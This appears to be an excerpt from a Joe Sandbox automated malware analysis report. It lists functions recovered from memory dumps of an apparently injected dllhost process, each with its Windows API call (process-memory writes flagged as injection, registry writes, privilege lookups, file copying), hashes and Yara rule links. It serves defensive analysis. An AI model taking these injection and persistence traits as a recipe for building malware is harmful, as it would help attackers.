Instruction Fuzzy Hash: 4821AEB95002009FE721CE55CC84FA7F7ECEF04710F08855AEA458B251D364E804DAB2

Function 0063A589 Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0063A608

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: bfb2b4410b80b21549c8d6067b1fd4cdbe23d2f89bbb7264c628d406be02e4b2
Instruction ID: 9d4c1bafd4bd880e9f05cfe399eaf1216db50d9c245db94eb888ef64e615a278
Opcode Fuzzy Hash: bfb2b4410b80b21549c8d6067b1fd4cdbe23d2f89bbb7264c628d406be02e4b2
Instruction Fuzzy Hash: 5E218B754093C09FDB228F21DC54A92FFB4EF17210F0D84DAE9848B2A3D265A949DB62

Function 0063ADE8 Relevance: 1.6, APIs: 1, Instructions: 66fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 0063AE56

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 40f292115cdb99d563be5299491287b96db0633ec05f65aae85af0cc41e9e4fd
Instruction ID: 2c720a485b126af8e3173593626ad4a3d4f9c20836ac048d413d33f7c875cecd
Opcode Fuzzy Hash: 40f292115cdb99d563be5299491287b96db0633ec05f65aae85af0cc41e9e4fd
Instruction Fuzzy Hash: 542163715093805FDB11CF65DC45B92BFE8EF46210F0884AEED85CB262D225E854DB61

Function 0063B06A Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E24,61998A8B,00000000,00000000,00000000,00000000), ref: 0063B0DC

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5a8b1a82a137e099e1933f53b60897e309f19c8cac4b4ddf3806c362d181e8dd
Instruction ID: fdc4706bba3ed2f10733f7d9073f8ecd351526b569e2d260e1d57de10a6ecc91
Opcode Fuzzy Hash: 5a8b1a82a137e099e1933f53b60897e309f19c8cac4b4ddf3806c362d181e8dd
Instruction Fuzzy Hash: 6B119076504600AFEB21CE15DC85FABFBECEF04724F08855AEE459B251D374E805CAB2

Function 0063B1C6 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0063B22E

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 2df315af6c41653afc9e53bf92c03650b7bc3b1944daeccb4a1673cccc7f17b2
Instruction ID: 4fc9366c136bffce4ef82d554b528086dc1f1e6c05a90abe9fd21cba5af8d936
Opcode Fuzzy Hash: 2df315af6c41653afc9e53bf92c03650b7bc3b1944daeccb4a1673cccc7f17b2
Instruction Fuzzy Hash: 15118171605380AFDB11CE15DC45B67BFE8EF45720F0884AAED45CB252D265E804CB61

Function 0063AA72 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E24,61998A8B,00000000,00000000,00000000,00000000), ref: 0063AAD1

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0c5a260bb93125b3057665579c5f6b3e72420d4a43f4178b746039d10183c18a
Instruction ID: ad484a78c66b35b8fef7756e3a936e2556c6085347fea7cebfa46b76a4a91842
Opcode Fuzzy Hash: 0c5a260bb93125b3057665579c5f6b3e72420d4a43f4178b746039d10183c18a
Instruction Fuzzy Hash: 44110176404200AFEB21CF51CD44FAAFBE8EF04324F08885AEE458B251C375A404DBF2

Function 0063A63B Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0063A6A8

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 41a3f3d77a67eda8d0929d7aa0560a9b28fb0092578c622fcb4d888199d52949
Instruction ID: 65af1aa6d074470503df2468e3bad6b38e1db9947d713196c6c0d726cc84c26a
Opcode Fuzzy Hash: 41a3f3d77a67eda8d0929d7aa0560a9b28fb0092578c622fcb4d888199d52949
Instruction Fuzzy Hash: E4118E754097C05FDB128B21D845692BFB4EF07324F0D84DAD8894F263D265A949DB62

Function 0063B1E6 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0063B22E

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 7d4e45cde50b9a641685ade3cda8ad621c47a9bfd3799642250ad0b9f16213a7
Instruction ID: 96219c7915ca25118b1c777136909fa6111946f702b29e746c7b4e188f9e35f9
Opcode Fuzzy Hash: 7d4e45cde50b9a641685ade3cda8ad621c47a9bfd3799642250ad0b9f16213a7
Instruction Fuzzy Hash: CC1182716042409FEB50CF1AD8457A7FBD8EF04720F08C5AADE09CB751D775E904CAA1

Function 0063AE0E Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 0063AE56

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 7d4e45cde50b9a641685ade3cda8ad621c47a9bfd3799642250ad0b9f16213a7
Instruction ID: 6abe17aa91050e12167f0fbd51c517804db1a51deda7fb67282c5c3f61511091
Opcode Fuzzy Hash: 7d4e45cde50b9a641685ade3cda8ad621c47a9bfd3799642250ad0b9f16213a7
Instruction Fuzzy Hash: 9A1182716042408FEB50CF55DD45796FBD8EF04720F08C46AED89CB351D335E804EAA2

Function 0063A8E2 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E24,61998A8B,00000000,00000000,00000000,00000000), ref: 0063A935

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: e4fab95b246e9dca2c4b3a182bda3a1b31a95d657b9e456dfdd2b89cb5a7088a
Instruction ID: c261f5f10700eddc1cd0b11315675867f55ea7d5adbf13a103f217a2ff452be4
Opcode Fuzzy Hash: e4fab95b246e9dca2c4b3a182bda3a1b31a95d657b9e456dfdd2b89cb5a7088a
Instruction Fuzzy Hash: A801C079504204AEF720CF05DC85BAAFBA8DF44724F18C49AEE449B291D378A9048AF2

Function 0063AC8C Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 0063ACE0

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: ac9a341551aafec0e3409cdcfa61b9bfe8ac2ca9dd66b4a892216ed43881cd71
Instruction ID: cacd853fcc8059f545529c63781d1572b925e500ead5d570d2f313a805c86efa
Opcode Fuzzy Hash: ac9a341551aafec0e3409cdcfa61b9bfe8ac2ca9dd66b4a892216ed43881cd71
Instruction Fuzzy Hash: F611A1755093809FDB128F15DC95B52FFB4DF46220F08C0EBED858B6A3D265A908DBA2

Function 0063A172 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0063A1C2

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: ee8f9f7f9ea8b6fa9bfe84dfd77e4f8dbca70c25559eb3ae4acfc60293f483c1
Instruction ID: 32d4178ccc20b33a93de46ef45a3118d76a41223b94ad9a03fec02819b2f36b2
Opcode Fuzzy Hash: ee8f9f7f9ea8b6fa9bfe84dfd77e4f8dbca70c25559eb3ae4acfc60293f483c1
Instruction Fuzzy Hash: C8017171500200ABD710DF16DC45B76FBE8FB88A20F18856AED089B741D735F915CBE6

Function 0063A5C2 Relevance: 1.5, APIs: 1, Instructions: 43injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0063A608

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0a0725336cb74aa79887343a8c9bf37c8f15b0c6368130bd6e48d7530029bb12
Instruction ID: 4021155ec7f362b4e9c127a704b6e955823882e45b56ba79c5b79375d3d5ab67
Opcode Fuzzy Hash: 0a0725336cb74aa79887343a8c9bf37c8f15b0c6368130bd6e48d7530029bb12
Instruction Fuzzy Hash: 20016D755042409FEB20CF55D885B61FBE4EF15320F0C849ADE854B262D375E859EBA2

Function 0063ACAE Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 0063ACE0

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 0263993f3b526e8f813d7e88369a207a0beee2fa1071cd9756909d81d8c0261a
Instruction ID: d1d18087364d932513362156916008906a37143d6b5d4a4a02717f31ff6d843e
Opcode Fuzzy Hash: 0263993f3b526e8f813d7e88369a207a0beee2fa1071cd9756909d81d8c0261a
Instruction Fuzzy Hash: 1001D1355042408FEB108F1AD9857A1FBE4EF04321F08C0AADD498B752D379E804EAE2

Function 0063AD72 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE ref: 0063ADA1

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: ac5258488c586feb89c7ec780cfca51aa70afd228b22d48b7b95c0381f63241c
Instruction ID: 749b153003223f952c1c19f5e36749c117570a4be49bda3831ec4a78ca33f7fb
Opcode Fuzzy Hash: ac5258488c586feb89c7ec780cfca51aa70afd228b22d48b7b95c0381f63241c
Instruction Fuzzy Hash: 9201D1304042448FEB10CF56D985796FBE4DF40321F08C4AADD498F652D379A804DFE2

Function 0063A676 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0063A6A8

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cee5762f648e9f117b54e524c7b91a6d53c2abd8d3ec92566b290663cb6f1294
Instruction ID: 7a5931418b8e33e5c555f3c5adf05eefab4e57f269385fa0805dba4ab37aa37a
Opcode Fuzzy Hash: cee5762f648e9f117b54e524c7b91a6d53c2abd8d3ec92566b290663cb6f1294
Instruction Fuzzy Hash: 2DF0AF748042448FEB10CF16D986761FBE4EF05324F1CC49ADD4A4B362D379A815EEA3

Function 049B07C7 Relevance: 1.5, Strings: 1, Instructions: 202COMMON

Download Yara Rule

Strings

2, xrefs: 049B07FD

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: 8c1617a8f93b55f7b06ff40a6ecc7f3f5e4140710de2c23aef8fd53dd83d269c
Instruction ID: ff288fa2c014ec00a5bff7f72aee5057fba2915c8cd1434b871af35c5acf7027
Opcode Fuzzy Hash: 8c1617a8f93b55f7b06ff40a6ecc7f3f5e4140710de2c23aef8fd53dd83d269c
Instruction Fuzzy Hash: F651E9B6C8738ADFDB118B2698D64C47FB0EE2221970484DAD8504F14FF66C264BAF75

Function 0063B3FC Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0063B468

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5cc5d96e533594bfdd1b111214dedb4421e860bb34e6feaad53c1bb77369c8d5
Instruction ID: ae7b6542fab3f795f125f327b9f0b86f79e1e824acbf5e740f6d5b47819e3d94
Opcode Fuzzy Hash: 5cc5d96e533594bfdd1b111214dedb4421e860bb34e6feaad53c1bb77369c8d5
Instruction Fuzzy Hash: 2721A1725093C05FDB028B25DC54792BFF4AF47324F0D84DAED858F263D265A908CB62

Function 0063A3C0 Relevance: 1.3, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0063A414

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b522a219a50fcd1e5e017d50073861c27197d0aa99982715a4338b4fbc42703c
Instruction ID: a6f272220363789c1630da6b52ead7f3cb37fe55a87b688e08b51a76845fcea5
Opcode Fuzzy Hash: b522a219a50fcd1e5e017d50073861c27197d0aa99982715a4338b4fbc42703c
Instruction Fuzzy Hash: 0411A7715093809FDB12CF15DC94752BFB4DF46220F0884DBED858F653D275A818CB62

Function 0063A3E2 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0063A414

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ec8ec4288c418ba289794ae7cfaa47aaf5b9b09b28d369403118bdc0862e8620
Instruction ID: 2c42d6201d8c5358cadf2e7c2e701a975f8b013b9d9b3b5f4a8d4a6f5848eb76
Opcode Fuzzy Hash: ec8ec4288c418ba289794ae7cfaa47aaf5b9b09b28d369403118bdc0862e8620
Instruction Fuzzy Hash: 0101DF715042408FEB10CF56D8897A6FBE4EF40320F08C4ABDD898F252D2B9E814DAA2

Function 0063B436 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0063B468

Memory Dump Source

Source File: 0000001A.00000002.1993118028.000000000063A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_63a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 7960063f6a62e9dc447f53a96db7a41f5139d0654812eae1a16651e62a87d47d
Instruction ID: e0e4146199f844b3601404fb26e9fc15f3015c4ae0880b4e895ac2aa6b0f81a2
Opcode Fuzzy Hash: 7960063f6a62e9dc447f53a96db7a41f5139d0654812eae1a16651e62a87d47d
Instruction Fuzzy Hash: B5017C759042408FEB10CF1AE985796BBE4EF44720F08C4AADE498B657D375A814CBA2

Function 04846CF8 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

:@Ul, xrefs: 04846D0D

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul
API String ID: 0-1300287099
Opcode ID: f5c16333e2689963affb34a3cb920f0d320ee2a3fcbe4240c292d2a7f87bd82f
Instruction ID: 6d533e9608ba5f752c4a1995906c68c70cefa3dcbfc0bf336a91f41ca128c9e4
Opcode Fuzzy Hash: f5c16333e2689963affb34a3cb920f0d320ee2a3fcbe4240c292d2a7f87bd82f
Instruction Fuzzy Hash: 9BF04C34A083488FC305DB7969161667BF6BFC660470580A6C849CB377FF742D18C721

Function 048410DE Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

|, xrefs: 0484392A

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 7a9326e7d73d4a463f9be2a1e6f54179cf136ccda3fda4ff9a22085d80938876
Instruction ID: 3c8d01d6398b80788b18df43ee9cddeb068fe90f09c7a5eee84c58cfef04ac8e
Opcode Fuzzy Hash: 7a9326e7d73d4a463f9be2a1e6f54179cf136ccda3fda4ff9a22085d80938876
Instruction Fuzzy Hash: 6FF02D71B0C25CCBE7104F54881436C7760AB85394F0846E6DC09D7281D7799D00CBD6

Function 04840372 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

9, xrefs: 048456AC

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: 8991c88ec1fb5a89ce6aac5d0e2a35fb4c4add92909adb16eca62bfd1d443e21
Instruction ID: 581f3adc29553dff0e8eaed4756ab6093f88bdbfd14f102013991886b11f9d21
Opcode Fuzzy Hash: 8991c88ec1fb5a89ce6aac5d0e2a35fb4c4add92909adb16eca62bfd1d443e21
Instruction Fuzzy Hash: F8E026B56081A9CFE7405F18842134C3790AB44394F0449DAE901C7242D7791E018F4A

Function 049B0295 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

M, xrefs: 049B02C3

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 7ea11ef5822e2226fca392cf1be90e182f1a0b2b50f303fac26b9d88034c7f20
Instruction ID: 40b0a7a39fdf70d54dcbcbacd0d74c74db67b38d0327150e0f119ec0b9033ff8
Opcode Fuzzy Hash: 7ea11ef5822e2226fca392cf1be90e182f1a0b2b50f303fac26b9d88034c7f20
Instruction Fuzzy Hash: 5FE04670E05248DBEB08DFA9C60469EBBB2BF85304F508839C146EA344EBB859048B86

Function 049B010A Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

K, xrefs: 049B0136

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-856455061
Opcode ID: 472ba4faf4a100ebd4593a562e9503548d64ce795a05129c2041a56364de56fe
Instruction ID: 01176d7a728a9def6bc1a20f69b6ac87c950e78b01de1701c098051a259248f8
Opcode Fuzzy Hash: 472ba4faf4a100ebd4593a562e9503548d64ce795a05129c2041a56364de56fe
Instruction Fuzzy Hash: B5E08C34E0520ACFEB08DFB8DA0469E77B2BF80304F508835D506DA304EB389A048B86

Function 049B09AE Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

V, xrefs: 049B09C6

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: dfec17c2d3c61d86ec2f23b34b22404a84c4fb007fa05cbbcc4fcda104c31cc5
Instruction ID: 12f972c3d10ae9227fed7a35bf1ff222b511c705c2a2640e735b5aac5c268fab
Opcode Fuzzy Hash: dfec17c2d3c61d86ec2f23b34b22404a84c4fb007fa05cbbcc4fcda104c31cc5
Instruction Fuzzy Hash: 39E08C38A0220ACFEF089FE8DB1879F37B2FF41304F904825D542DA340EB785A448B86

Function 049B0639 Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

/, xrefs: 049B065E

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 98cc0316aca7bc7b8e7fe2307848fb14a09a7b883db34715a5be6d1594269716
Instruction ID: 6f2097970b3c206bb9019a23d745ae3e56f3f7f82a109ec0d608df00557c7099
Opcode Fuzzy Hash: 98cc0316aca7bc7b8e7fe2307848fb14a09a7b883db34715a5be6d1594269716
Instruction Fuzzy Hash: 15D0A73080B24A8FDB01DB7485193987FF0AF07210F9045E28092DB2A3EE38581D9741

Function 049B037E Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

d, xrefs: 049B03A3

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 6f368af79483c73db8af467c21f6912bbcf89a378840ba94b50e1839616231f8
Instruction ID: 74bce3f3f8d35073ab1c5760d20fcb79abee4ccfbe5bfcc35726f3f19475cd0e
Opcode Fuzzy Hash: 6f368af79483c73db8af467c21f6912bbcf89a378840ba94b50e1839616231f8
Instruction Fuzzy Hash: FAD0A730E013458BD7415B6489253CC3BE1AF01240F848566C086DB341DE7908094781

Function 049B0222 Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

(, xrefs: 049B0237

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 8ee1e1a02e7046e29aac005cbcab887935e46db4a35544d69ae3c7161390f643
Instruction ID: 8a64f629adf91a4bde4f2efc275152ca9820bd6de83e42c540eed2de310d08a6
Opcode Fuzzy Hash: 8ee1e1a02e7046e29aac005cbcab887935e46db4a35544d69ae3c7161390f643
Instruction Fuzzy Hash: 50D09234A06209CBDF489FA8D2586AE77A2AB45300FA04839D042EA345DA385E489B85

Function 049B08DC Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

L, xrefs: 049B08F4

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: 0475e70c8a160b9b6a2f9709b082a9b3e8ea23ff3f52776a24e53f0c477f4389
Instruction ID: a84288b9d71655e8fbfed3c82a109e44c4e6696656fdcbbe53fd0cce7e119b85
Opcode Fuzzy Hash: 0475e70c8a160b9b6a2f9709b082a9b3e8ea23ff3f52776a24e53f0c477f4389
Instruction Fuzzy Hash: 9FC04C70A42105CBEB44AFB48618BDC76A6AB55304F904469854AA6385EA7C1A048B45

Function 049B0415 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

\, xrefs: 049B042A

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: 6ae92cf06f2d151123d9a89ec4996c9c28fc0ff30efe242ca18eadb01d6e76af
Instruction ID: a8687a24316282397ee57b1953b1c297ed88623781ee16f8ef2407ea8ddead06
Opcode Fuzzy Hash: 6ae92cf06f2d151123d9a89ec4996c9c28fc0ff30efe242ca18eadb01d6e76af
Instruction Fuzzy Hash: 2BC04C74E01245CBEB549FB48528B9D76A1AB55305F9084298512A7385EA7814044F41

Function 049B04C9 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

[, xrefs: 049B04DE

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-784033777
Opcode ID: ccaa48d18665efab48cb1478547e4d54154cc2a2d583b95088ef6107df4b3d25
Instruction ID: bd81916001b231b32c3799a3eb2276ef4fb7e24a0d56b87a4bb25769ff2d4f8e
Opcode Fuzzy Hash: ccaa48d18665efab48cb1478547e4d54154cc2a2d583b95088ef6107df4b3d25
Instruction Fuzzy Hash: 20C04C70E01205CBEB449FA4851879D76A5AB55345F8084299546EB384EA781504CF41

Function 049B0500 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

;, xrefs: 049B0515

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID: ;
API String ID: 0-1661535913
Opcode ID: 6b9cc1cb889b4d9e4e28d6aaf3d91a1c9f54990c7ab37941cca7a37a3c7c67e1
Instruction ID: 7afbc07de2a2c0b6fbc0e24e9570d752d162a811217fec3bdfc3f815172ea30b
Opcode Fuzzy Hash: 6b9cc1cb889b4d9e4e28d6aaf3d91a1c9f54990c7ab37941cca7a37a3c7c67e1
Instruction Fuzzy Hash: ADC04C70E021058BDB449FB4821879D76A6AB55744F9045399502A7385EA791A04CB41

Function 049B0340 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

6, xrefs: 049B0358

Memory Dump Source

